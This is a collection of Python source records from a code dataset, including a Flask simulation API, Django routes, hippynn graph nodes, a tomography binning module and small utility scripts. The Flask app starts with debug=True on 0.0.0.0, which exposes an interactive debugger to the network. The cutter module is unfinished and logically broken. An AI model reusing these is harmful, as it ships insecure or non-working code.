ctx = run_ansys(ctx)  # run_simulation is a module-level function, so there is no self; pass the local ctx
else:
return jsonify(ctx["error"]["validate"])
return jsonify(ctx["response"])
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
| from flask import Flask, request, jsonify
from flask_cors import CORS
from run import run_ansys
from api.validate import spec_present, data_type_validate, spec_keys_validate, ansys_overload_check
ansys_processing_count = 0
# debug
# import ipdb; ipdb.set_trace()
app = Flask(__name__)
CORS(app) # local development cors
@app.route('/run_simu', methods=["POST"])
def run_simulation():
global ansys_processing_count
ansys_processing_count += 1
ctx = {
"request": request.get_json(),
"allow_run": True,
"process": {
"limit": 4,
"count": ansys_processing_count,
},
"start_run_response": {"msg": "start run at background"},
"error": {
"validate": {"msg": ""}
}
}
if spec_present(ctx) and \
data_type_validate(ctx) and \
spec_keys_validate(ctx) and \
ansys_overload_check(ctx):
ctx = run_ansys(ctx)  # run_simulation is a module-level function, so there is no self; pass the local ctx
else:
return jsonify(ctx["error"]["validate"])
return jsonify(ctx["response"])
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
| en | 0.341183 | # debug # import ipdb; ipdb.set_trace() # local development cors | 2.527788 | 3 |
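For the Flask service in record 8089, clients POST JSON to /run_simu and receive a JSON reply. The sketch below assumes a local server on port 5000 and uses a placeholder payload; the real required keys are enforced by spec_present/spec_keys_validate in api.validate, which is not part of this record.

import requests  # assumed available; any HTTP client would do

# Placeholder body — replace with the spec fields that api.validate expects.
payload = {"spec": {"example_key": "example_value"}}

response = requests.post("http://localhost:5000/run_simu", json=payload)
print(response.status_code, response.json())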
cnn/donas_utils/dataset/__init__.py | eric8607242/darts | 0 | 8090 | <reponame>eric8607242/darts
from .dataset import get_cifar100, get_cifar10, get_imagenet_lmdb, get_imagenet
__all__ = ["get_cifar100", "get_cifar10", "get_imagenet_lmdb", "get_imagenet"]
| from .dataset import get_cifar100, get_cifar10, get_imagenet_lmdb, get_imagenet
__all__ = ["get_cifar100", "get_cifar10", "get_imagenet_lmdb", "get_imagenet"] | none | 1 | 1.200992 | 1 |
|
classifier/cross_validation.py | ahmdrz/spam-classifier | 1 | 8091 | <gh_stars>1-10
from sklearn.model_selection import KFold
def kfold_cross_validation(data, k=10):
kfold = KFold(n_splits=k)
for train, test in kfold.split(data):
yield data[train], data[test] | from sklearn.model_selection import KFold
def kfold_cross_validation(data, k=10):
kfold = KFold(n_splits=k)
for train, test in kfold.split(data):
yield data[train], data[test] | none | 1 | 2.728278 | 3 |
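A quick usage sketch for record 8091's generator, using a toy NumPy array in place of the spam-classifier features (the data values are arbitrary):

import numpy as np

# Stand-in feature matrix: 50 samples, 2 features.
data = np.arange(100).reshape(50, 2)

# Relies on kfold_cross_validation as defined in the record above.
for train_split, test_split in kfold_cross_validation(data, k=10):
    # Each iteration yields the train rows and test rows of one fold.
    print(train_split.shape, test_split.shape)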
|
category/models.py | captainxavier/AutoBlog | 0 | 8092 | from django.db import models
class Category(models.Model):
title = models.CharField(max_length=20)
class Meta:
db_table = 'category'
verbose_name = ("Category")
verbose_name_plural = ("Categories")
def __str__(self):
return self.title
| from django.db import models
class Category(models.Model):
title = models.CharField(max_length=20)
class Meta:
db_table = 'category'
verbose_name = ("Category")
verbose_name_plural = ("Categories")
def __str__(self):
return self.title
| none | 1 | 2.350949 | 2 |
|
admin_tools/urls.py | aucoeur/WeVoteServer | 44 | 8093 | # admin_tools/urls.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.conf.urls import re_path
from . import views
urlpatterns = [
re_path(r'^$', views.admin_home_view, name='admin_home',),
re_path(r'^data_cleanup/$', views.data_cleanup_view, name='data_cleanup'),
re_path(r'^data_cleanup_organization_analysis/$',
views.data_cleanup_organization_analysis_view, name='data_cleanup_organization_analysis'),
re_path(r'^data_cleanup_organization_list_analysis/$',
views.data_cleanup_organization_list_analysis_view, name='data_cleanup_organization_list_analysis'),
re_path(r'^data_cleanup_position_list_analysis/$',
views.data_cleanup_position_list_analysis_view, name='data_cleanup_position_list_analysis'),
re_path(r'^data_cleanup_voter_hanging_data_process/$',
views.data_cleanup_voter_hanging_data_process_view, name='data_cleanup_voter_hanging_data_process'),
re_path(r'^data_cleanup_voter_list_analysis/$',
views.data_cleanup_voter_list_analysis_view, name='data_cleanup_voter_list_analysis'),
re_path(r'^data_voter_statistics/$', views.data_voter_statistics_view, name='data_voter_statistics'),
re_path(r'^import_sample_data/$', views.import_sample_data_view, name='import_sample_data'),
re_path(r'^statistics/$', views.statistics_summary_view, name='statistics_summary'),
re_path(r'^sync_dashboard/$', views.sync_data_with_master_servers_view, name='sync_dashboard'),
]
| # admin_tools/urls.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.conf.urls import re_path
from . import views
urlpatterns = [
re_path(r'^$', views.admin_home_view, name='admin_home',),
re_path(r'^data_cleanup/$', views.data_cleanup_view, name='data_cleanup'),
re_path(r'^data_cleanup_organization_analysis/$',
views.data_cleanup_organization_analysis_view, name='data_cleanup_organization_analysis'),
re_path(r'^data_cleanup_organization_list_analysis/$',
views.data_cleanup_organization_list_analysis_view, name='data_cleanup_organization_list_analysis'),
re_path(r'^data_cleanup_position_list_analysis/$',
views.data_cleanup_position_list_analysis_view, name='data_cleanup_position_list_analysis'),
re_path(r'^data_cleanup_voter_hanging_data_process/$',
views.data_cleanup_voter_hanging_data_process_view, name='data_cleanup_voter_hanging_data_process'),
re_path(r'^data_cleanup_voter_list_analysis/$',
views.data_cleanup_voter_list_analysis_view, name='data_cleanup_voter_list_analysis'),
re_path(r'^data_voter_statistics/$', views.data_voter_statistics_view, name='data_voter_statistics'),
re_path(r'^import_sample_data/$', views.import_sample_data_view, name='import_sample_data'),
re_path(r'^statistics/$', views.statistics_summary_view, name='statistics_summary'),
re_path(r'^sync_dashboard/$', views.sync_data_with_master_servers_view, name='sync_dashboard'),
]
| en | 0.869473 | # admin_tools/urls.py # Brought to you by We Vote. Be good. # -*- coding: UTF-8 -*- | 1.65709 | 2 |
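Because every route in record 8093 is named, other code can build these admin URLs with Django's reverse() instead of hard-coding paths. This is a generic illustration, not code from WeVoteServer; if the URLconf is included under a namespace, the names would need that prefix (e.g. 'admin_tools:admin_home').

from django.urls import reverse

# Requires a configured Django settings module and the URLconf above to be included.
admin_home_url = reverse('admin_home')
data_cleanup_url = reverse('data_cleanup')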
hippynn/graphs/nodes/base/multi.py | tautomer/hippynn | 21 | 8094 | """
A base node that provides several output tensors.
"""
from ....layers.algebra import Idx
from .base import SingleNode, Node
from .. import _debprint
from ...indextypes import IdxType
class IndexNode(SingleNode):
_input_names = ("parent",)
def __init__(self, name, parents, index, index_state=None):
if len(parents) != 1:
raise TypeError("Index node takes exactly one parent.")
par = parents[0]
iname = par._output_names[index] if hasattr(par, "_output_names") else "<{index}>".format(index=index)
repr_info = {"parent_name": par.name, "index": iname}
module = Idx(index, repr_info=repr_info)
self.index = index
self._index_state = IdxType.NotFound if index_state is None else index_state
super().__init__(name, parents, module=module)
class MultiNode(Node): # Multinode
_output_names = NotImplemented
_output_index_states = NotImplemented # optional?
_main_output = NotImplemented
def __init__(self, name, parents, module="auto", *args, db_name=None, **kwargs):
super().__init__(name, parents, *args, module=module, **kwargs)
self.children = tuple(
IndexNode(name + "." + cn, (self,), index=i, index_state=cidx)
for i, (cn, cidx) in enumerate(zip(self._output_names, self._output_index_states))
)
self.main_output.db_name = db_name
def set_dbname(self, db_name):
self.main_output.set_dbname(db_name)
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
# Enforce _child_index_states has same length as _output_names
if cls._output_index_states is not NotImplemented:
if len(cls._output_index_states) != len(cls._output_names):
raise AssertionError(
"Lengths of _child_index_states {} doesn't match lengths of ouput_names {}".format(
cls._output_index_states, cls._output_names
)
)
# Enforce no name conflict between input names and output names
if cls._input_names is not NotImplemented:
try:
assert all(o not in cls._input_names for o in cls._output_names)
except AssertionError as ae:
raise ValueError(
"Multi-node output names {} conflict with input names {}".format(
cls._output_names, cls._input_names
)
) from ae
def __dir__(self):
dir_ = super().__dir__()
if self._output_names is not NotImplemented:
dir_ = dir_ + list(self._output_names)
return dir_
def __getattr__(self, item):
if item in ("children", "_output_names"): # Guard against recursion
raise AttributeError("Attribute {} not yet present.".format(item))
try:
return super().__getattr__(item) # Defer to BaseNode first
except AttributeError:
pass
try:
return self.children[self._output_names.index(item)]
except (AttributeError, ValueError):
raise AttributeError("{} object has no attribute '{}'".format(self.__class__, item))
@property
def main_output(self):
if self._main_output is NotImplemented:
return super().main_output
return getattr(self, self._main_output)
| """
A base node that provides several output tensors.
"""
from ....layers.algebra import Idx
from .base import SingleNode, Node
from .. import _debprint
from ...indextypes import IdxType
class IndexNode(SingleNode):
_input_names = ("parent",)
def __init__(self, name, parents, index, index_state=None):
if len(parents) != 1:
raise TypeError("Index node takes exactly one parent.")
par = parents[0]
iname = par._output_names[index] if hasattr(par, "_output_names") else "<{index}>".format(index=index)
repr_info = {"parent_name": par.name, "index": iname}
module = Idx(index, repr_info=repr_info)
self.index = index
self._index_state = IdxType.NotFound if index_state is None else index_state
super().__init__(name, parents, module=module)
class MultiNode(Node): # Multinode
_output_names = NotImplemented
_output_index_states = NotImplemented # optional?
_main_output = NotImplemented
def __init__(self, name, parents, module="auto", *args, db_name=None, **kwargs):
super().__init__(name, parents, *args, module=module, **kwargs)
self.children = tuple(
IndexNode(name + "." + cn, (self,), index=i, index_state=cidx)
for i, (cn, cidx) in enumerate(zip(self._output_names, self._output_index_states))
)
self.main_output.db_name = db_name
def set_dbname(self, db_name):
self.main_output.set_dbname(db_name)
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
# Enforce _child_index_states has same length as _output_names
if cls._output_index_states is not NotImplemented:
if len(cls._output_index_states) != len(cls._output_names):
raise AssertionError(
"Lengths of _child_index_states {} doesn't match lengths of ouput_names {}".format(
cls._output_index_states, cls._output_names
)
)
# Enforce no name conflict between input names and output names
if cls._input_names is not NotImplemented:
try:
assert all(o not in cls._input_names for o in cls._output_names)
except AssertionError as ae:
raise ValueError(
"Multi-node output names {} conflict with input names {}".format(
cls._output_names, cls._input_names
)
) from ae
def __dir__(self):
dir_ = super().__dir__()
if self._output_names is not NotImplemented:
dir_ = dir_ + list(self._output_names)
return dir_
def __getattr__(self, item):
if item in ("children", "_output_names"): # Guard against recursion
raise AttributeError("Attribute {} not yet present.".format(item))
try:
return super().__getattr__(item) # Defer to BaseNode first
except AttributeError:
pass
try:
return self.children[self._output_names.index(item)]
except (AttributeError, ValueError):
raise AttributeError("{} object has no attribute '{}'".format(self.__class__, item))
@property
def main_output(self):
if self._main_output is NotImplemented:
return super().main_output
return getattr(self, self._main_output)
| en | 0.850411 | A base node that provides several output tensors. # Multinode # optional? # Enforce _child_index_states has same length as _output_names # Enforce no name conflict between input names and output names # Guard against recursion # Defer to BaseNode first | 2.425441 | 2 |
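To make the MultiNode contract in record 8094 concrete: a subclass only needs to declare _output_names (and, optionally, _output_index_states and _main_output); the base __init__ then builds one IndexNode child per output and exposes each by attribute. The subclass below is schematic and does not correspond to any real hippynn node.

# Schematic subclass; assumes MultiNode, IndexNode and IdxType from the module above.
class PairOutputsNode(MultiNode):
    _output_names = ("values", "weights")
    _output_index_states = (IdxType.NotFound, IdxType.NotFound)
    _main_output = "values"

# After construction, node.values and node.weights are IndexNode children,
# and node.main_output resolves to node.values.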
main_module/__init__.py | JohanNicander/python-test-architecture | 0 | 8095 | from .zero import zero
from main_module._unittester import UnitTester
test = UnitTester(__name__)
del UnitTester | from .zero import zero
from main_module._unittester import UnitTester
test = UnitTester(__name__)
del UnitTester | none | 1 | 1.329398 | 1 |
|
barber/cutter.py | LSSTDESC/barber | 0 | 8096 | import numpy as np
import numpy.random as npr
import scipy.optimize as spo
import tomo_challenge.metrics as tcm
from collections import namedtuple  # required for the TreePars definition below
# custom data type, could be replaced with/tie in to tree.py class
# cut_vals is (nfeat, nbins - 1) numpy array, float
# tree_ids is ((nbins,) * nfeat) numpy array, int
TreePars = namedtuple('TreePars', ['cut_vals', 'tree_ids'])
# should maybe put this function in a class so we can call TreePars.to_array
def treepars_to_array(treepars):
"""
Flattens cut_vals and tree_ids for optimizer
"""
cuts = treepars.cut_vals.flatten()  # np.flatten does not exist; use ndarray.flatten
ids = treepars.tree_ids.flatten()
arr = np.concatenate((cuts, ids))
return(arr)
# should maybe put this function in a class so we can call TreePars.from_array
def array_to_treepars(arr):
"""
Converts optimizer format of 1D array back into namedtuple of arrays
"""
flat_cuts = arr[type(arr) == float]
flat_ids = arr[type(arr) == int]
nbins = len(np.unique(flat_ids))
nfeat = len(flat_cuts) / (nbins - 1)
# maybe do some assert checks with these just in case types have problems
# cuts = arr[0:nfeat*(nbins-1)].reshape((nfeat, nbins-1))
# ids = arr[feat*(nbins-1):].reshape((nbins,) * nfeat)
cuts = flat_cuts.reshape((nfeat, nbins-1))
ids = flat_ids.reshape((nbins,) * nfeat)
treepars = TreePars(cuts, ids)
return(treepars)
def get_cuts(galaxies, ival_treepars=None, nbins=3):
"""
Obtains simplest possible bin definitions: cuts in the space of observables given number of bins
Parameters
----------
galaxies: numpy.ndarray, float
observables (magnitudes and/or colors and/or errors) to serve as features for set of galaxies
shape(galaxies) = (ngals, nfeat)
ival_treepars: namedtuple, numpy.ndarray, float and int, optional
initial values for decision tree parameters
shape(ivals.cut_vals) = (nfeat, (nbins - 1))
shape(tree_ids) = ((nbins,) * nfeat)
nbins: int, optional
number of bins for which to obtain cuts
Returns
-------
assignments: numpy.ndarray, int
bin assignment for each galaxy
shape(assignments) = (ngals, 1)
Notes
-----
`sort_gals` does the heavy lifting.
`eval_metric` will call one of the metrics from [tomo_challenge](https://github.com/LSSTDESC/tomo_challenge/blob/master/tomo_challenge/metrics.py).
The original idea for a general, non-cut-based optimizer was to have parameters equal to the (ngals) length array of ints representing the bin assignments, but that's not necessary for the simple cut-and-sweep barber and would probably break `spo.minimize`.
"""
(ngals, nfeat) = np.shape(galaxies)
if ival_treepars is None:
cut_ivals = np.quantile(galaxies, np.linspace(0., 1., nbins), axis=1)
assert(len(cut_ivals.flatten()) == nbins**nfeat)  # ivals is not defined yet here; check the freshly computed cut_ivals
# need structure and way of making dumb version of these
tree_ids = npr.randint(0, nbins, nbins**nfeat)  # samples bin ids 0..nbins-1; random_integers is removed from modern NumPy
assert(len(np.unique(tree_ids)) == nbins)
tree_ids.reshape((nfeat, nbins))
ival_treepars = TreePars(cut_ivals, tree_ids)
ivals = treepars_to_array(ival_treepars)
opt_res = spo.minimize(eval_metric, ivals, args=galaxies)
treepars = array_to_treepars(opt_res.x)
assignments = sort_gals(galaxies, treepars)
return(assignments)
def sort_gals(galaxies, tree_pars):
"""
Divides available galaxies into subsets according to a given decision tree on their observables
Parameters
----------
galaxies: nfeature x n_gal array
tree: tree object
Notes
-----
could be based on bisect, or maybe a sklearn object?
"""
pass
def eval_metric(arr, galaxies):
"""
Just calls a metric from tomo_challenge wrapped for the `spo.minimize` API
Notes
-----
Replace `tcm.metric` with actual call to one of the tomo_challenge metrics
Actually, there's a problem in that the current tomo_challenge metrics require the true redshifts...
"""
treepars = array_to_treepars(arr)
assignments = sort_gals(galaxies, treepars)
metval = tcm.metric(assignments)
return metval
| import numpy as np
import numpy.random as npr
import scipy.optimize as spo
import tomo_challenge.metrics as tcm
from collections import namedtuple  # required for the TreePars definition below
# custom data type, could be replaced with/tie in to tree.py class
# cut_vals is (nfeat, nbins - 1) numpy array, float
# tree_ids is ((nbins,) * nfeat) numpy array, int
TreePars = namedtuple('TreePars', ['cut_vals', 'tree_ids'])
# should maybe put this function in a class so we can call TreePars.to_array
def treepars_to_array(treepars):
"""
Flattens cut_vals and tree_ids for optimizer
"""
cuts = treepars.cut_vals.flatten()  # np.flatten does not exist; use ndarray.flatten
ids = treepars.tree_ids.flatten()
arr = np.concatenate((cuts, ids))
return(arr)
# should maybe put this function in a class so we can call TreePars.from_array
def array_to_treepars(arr):
"""
Converts optimizer format of 1D array back into namedtuple of arrays
"""
flat_cuts = arr[type(arr) == float]
flat_ids = arr[type(arr) == int]
nbins = len(np.unique(flat_ids))
nfeat = len(flat_cuts) / (nbins - 1)
# maybe do some assert checks with these just in case types have problems
# cuts = arr[0:nfeat*(nbins-1)].reshape((nfeat, nbins-1))
# ids = arr[feat*(nbins-1):].reshape((nbins,) * nfeat)
cuts = flat_cuts.reshape((nfeat, nbins-1))
ids = flat_ids.reshape((nbins,) * nfeat)
treepars = TreePars(cuts, ids)
return(treepars)
def get_cuts(galaxies, ival_treepars=None, nbins=3):
"""
Obtains simplest possible bin definitions: cuts in the space of observables given number of bins
Parameters
----------
galaxies: numpy.ndarray, float
observables (magnitudes and/or colors and/or errors) to serve as features for set of galaxies
shape(galaxies) = (ngals, nfeat)
ival_treepars: namedtuple, numpy.ndarray, float and int, optional
initial values for decision tree parameters
shape(ivals.cut_vals) = (nfeat, (nbins - 1))
shape(tree_ids) = ((nbins,) * nfeat)
nbins: int, optional
number of bins for which to obtain cuts
Returns
-------
assignments: numpy.ndarray, int
bin assignment for each galaxy
shape(assignments) = (ngals, 1)
Notes
-----
`sort_gals` does the heavy lifting.
`eval_metric` will call one of the metrics from [tomo_challenge](https://github.com/LSSTDESC/tomo_challenge/blob/master/tomo_challenge/metrics.py).
The original idea for a general, non-cut-based optimizer was to have parameters equal to the (ngals) length array of ints representing the bin assignments, but that's not necessary for the simple cut-and-sweep barber and would probably break `spo.minimize`.
"""
(ngals, nfeat) = np.shape(galaxies)
if ival_treepars is None:
cut_ivals = np.quantile(galaxies, np.linspace(0., 1., nbins), axis=1)
assert(len(cut_ivals.flatten()) == nbins**nfeat)  # ivals is not defined yet here; check the freshly computed cut_ivals
# need structure and way of making dumb version of these
tree_ids = npr.randint(0, nbins, nbins**nfeat)  # samples bin ids 0..nbins-1; random_integers is removed from modern NumPy
assert(len(np.unique(tree_ids)) == nbins)
tree_ids.reshape((nfeat, nbins))
ival_treepars = TreePars(cut_ivals, tree_ids)
ivals = treepars_to_array(ival_treepars)
opt_res = spo.minimize(eval_metric, ivals, args=galaxies)
treepars = array_to_treepars(opt_res.x)
assignments = sort_gals(galaxies, treepars)
return(assignments)
def sort_gals(galaxies, tree_pars):
"""
Divides available galaxies into subsets according to a given decision tree on their observables
Parameters
----------
galaxies: nfeature x n_gal array
tree: tree object
Notes
-----
could be based on bisect, or maybe a sklearn object?
"""
pass
def eval_metric(arr, galaxies):
"""
Just calls a metric from tomo_challenge wrapped for the `spo.minimize` API
Notes
-----
Replace `tcm.metric` with actual call to one of the tomo_challenge metrics
Actually, there's a problem in that the current tomo_challenge metrics require the true redshifts...
"""
treepars = array_to_treepars(arr)
assignments = sort_gals(galaxies, treepars)
metval = tcm.metric(assignments)
return metval
| en | 0.788979 | # custom data type, could be replaced with/tie in to tree.py class # cut_vals is (nfeat, nbins - 1) numpy array, float # tree_ids is ((nbins,) * nfeat) numpy array, int # should maybe put this function in a class so we can call TreePars.to_array Flattens cut_vals and tree_ids for optimizer # should maybe put this function in a class so we can call TreePars.from_array Converts optimizer format of 1D array back into namedtuple of arrays # maybe do some assert checks with these just in case types have problems # cuts = arr[0:nfeat*(nbins-1)].reshape((nfeat, nbins-1)) # ids = arr[feat*(nbins-1):].reshape((nbins,) * nfeat) Obtains simplest possible bin definitions: cuts in the space of observables given number of bins Parameters ---------- galaxies: numpy.ndarray, float observables (magnitudes and/or colors and/or errors) to serve as features for set of galaxies shape(galaxies) = (ngals, nfeat) ival_treepars: namedtuple, numpy.ndarray, float and int, optional initial values for decision tree parameters shape(ivals.cut_vals) = (nfeat, (nbins - 1)) shape(tree_ids) = ((nbins,) * nfeat) nbins: int, optional number of bins for which to obtain cuts Returns ------- assignments: numpy.ndarray, int bin assignment for each galaxy shape(assignments) = (ngals, 1) Notes ----- `sort_gals` does the heavy lifting. `eval_metric` will call one of the metrics from [tomo_challenge](https://github.com/LSSTDESC/tomo_challenge/blob/master/tomo_challenge/metrics.py). The original idea for a general, non-cut-based optimizer was to have parameters equal to the (ngals) length array of ints representing the bin assignments, but that's not necessary for the simple cut-and-sweep barber and would probably break `spo.minimize`. # need structure and way of making dumb version of these Divides available galaxies into subsets according to a given decision tree on their observables Parameters ---------- galaxies: nfeature x n_gal array tree: tree object Notes ----- could be based on bisect, or maybe a sklearn object? Just calls a metric from tomo_challenge wrapped for the `spo.minimize` API Notes ----- Replace `tcm.metric` with actual call to one of the tomo_challenge metrics Actually, there's a problem in that the current tomo_challenge metrics require the true redshifts... | 2.460058 | 2 |
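Record 8096 leaves sort_gals as a stub, and its docstring only speculates about bisect or scikit-learn. One minimal way to realise it for a single observable — offered purely as a guess at the intended behaviour, not the authors' design — is a cut-based assignment with np.digitize:

import numpy as np

def sort_gals_single_feature(galaxies, treepars):
    # Assumes one observable per galaxy and monotonically increasing cut values.
    feature = galaxies[:, 0]
    cuts = np.sort(treepars.cut_vals[0])
    leaf = np.digitize(feature, cuts)       # leaf index 0 .. nbins-1
    return treepars.tree_ids.ravel()[leaf]  # map each leaf to its bin id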
examples/transfer/highscore.py | coding-world/matrix_max7219 | 0 | 8097 | <filename>examples/transfer/highscore.py
import shelve
regal = shelve.open('score.txt')
def updateScore(neuerScore):
if('score' in regal):
score = regal['score']
if(neuerScore not in score):
score.insert(0, neuerScore)
score.sort()
ranking = score.index(neuerScore)
ranking = len(score)-ranking
else:
score = [neuerScore]
ranking = 1
print(score)
print(ranking)
regal['score'] = score
return ranking
neuerScore = int(input("Neuer HighScore: \n"))
updateScore(neuerScore) | <filename>examples/transfer/highscore.py
import shelve
regal = shelve.open('score.txt')
def updateScore(neuerScore):
if('score' in regal):
score = regal['score']
if(neuerScore not in score):
score.insert(0, neuerScore)
score.sort()
ranking = score.index(neuerScore)
ranking = len(score)-ranking
else:
score = [neuerScore]
ranking = 1
print(score)
print(ranking)
regal['score'] = score
return ranking
neuerScore = int(input("Neuer HighScore: \n"))
updateScore(neuerScore) | none | 1 | 3.386168 | 3 |
|
src/node/ext/ldap/scope.py | enfold/node.ext.ldap | 3 | 8098 | <reponame>enfold/node.ext.ldap<gh_stars>1-10
# -*- coding: utf-8 -*-
import ldap
BASE = ldap.SCOPE_BASE
ONELEVEL = ldap.SCOPE_ONELEVEL
SUBTREE = ldap.SCOPE_SUBTREE
SCOPES = [BASE, ONELEVEL, SUBTREE]
del ldap
| # -*- coding: utf-8 -*-
import ldap
BASE = ldap.SCOPE_BASE
ONELEVEL = ldap.SCOPE_ONELEVEL
SUBTREE = ldap.SCOPE_SUBTREE
SCOPES = [BASE, ONELEVEL, SUBTREE]
del ldap | en | 0.769321 | # -*- coding: utf-8 -*- | 1.491237 | 1 |
urban-sound-classification/feature_merge.py | tensorflow-korea/tfk-notebooks | 50 | 8099 | import glob
import numpy as np
X = np.empty((0, 193))
y = np.empty((0, 10))
groups = np.empty((0, 1))
npz_files = glob.glob('./urban_sound_?.npz')
for fn in npz_files:
print(fn)
data = np.load(fn)
X = np.append(X, data['X'], axis=0)
y = np.append(y, data['y'], axis=0)
groups = np.append(groups, data['groups'], axis=0)
print(groups[groups>0])
print(X.shape, y.shape)
for r in y:
if np.sum(r) > 1.5:
print(r)
np.savez('urban_sound', X=X, y=y, groups=groups)
| import glob
import numpy as np
X = np.empty((0, 193))
y = np.empty((0, 10))
groups = np.empty((0, 1))
npz_files = glob.glob('./urban_sound_?.npz')
for fn in npz_files:
print(fn)
data = np.load(fn)
X = np.append(X, data['X'], axis=0)
y = np.append(y, data['y'], axis=0)
groups = np.append(groups, data['groups'], axis=0)
print(groups[groups>0])
print(X.shape, y.shape)
for r in y:
if np.sum(r) > 1.5:
print(r)
np.savez('urban_sound', X=X, y=y, groups=groups)
| none | 1 | 2.642741 | 3 |
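Once record 8099's script has written urban_sound.npz, the merged arrays can be read back with np.load — a brief sketch:

import numpy as np

merged = np.load("urban_sound.npz")
X, y, groups = merged["X"], merged["y"], merged["groups"]
print(X.shape, y.shape, groups.shape)  # expected: (n_clips, 193), (n_clips, 10), (n_clips, 1)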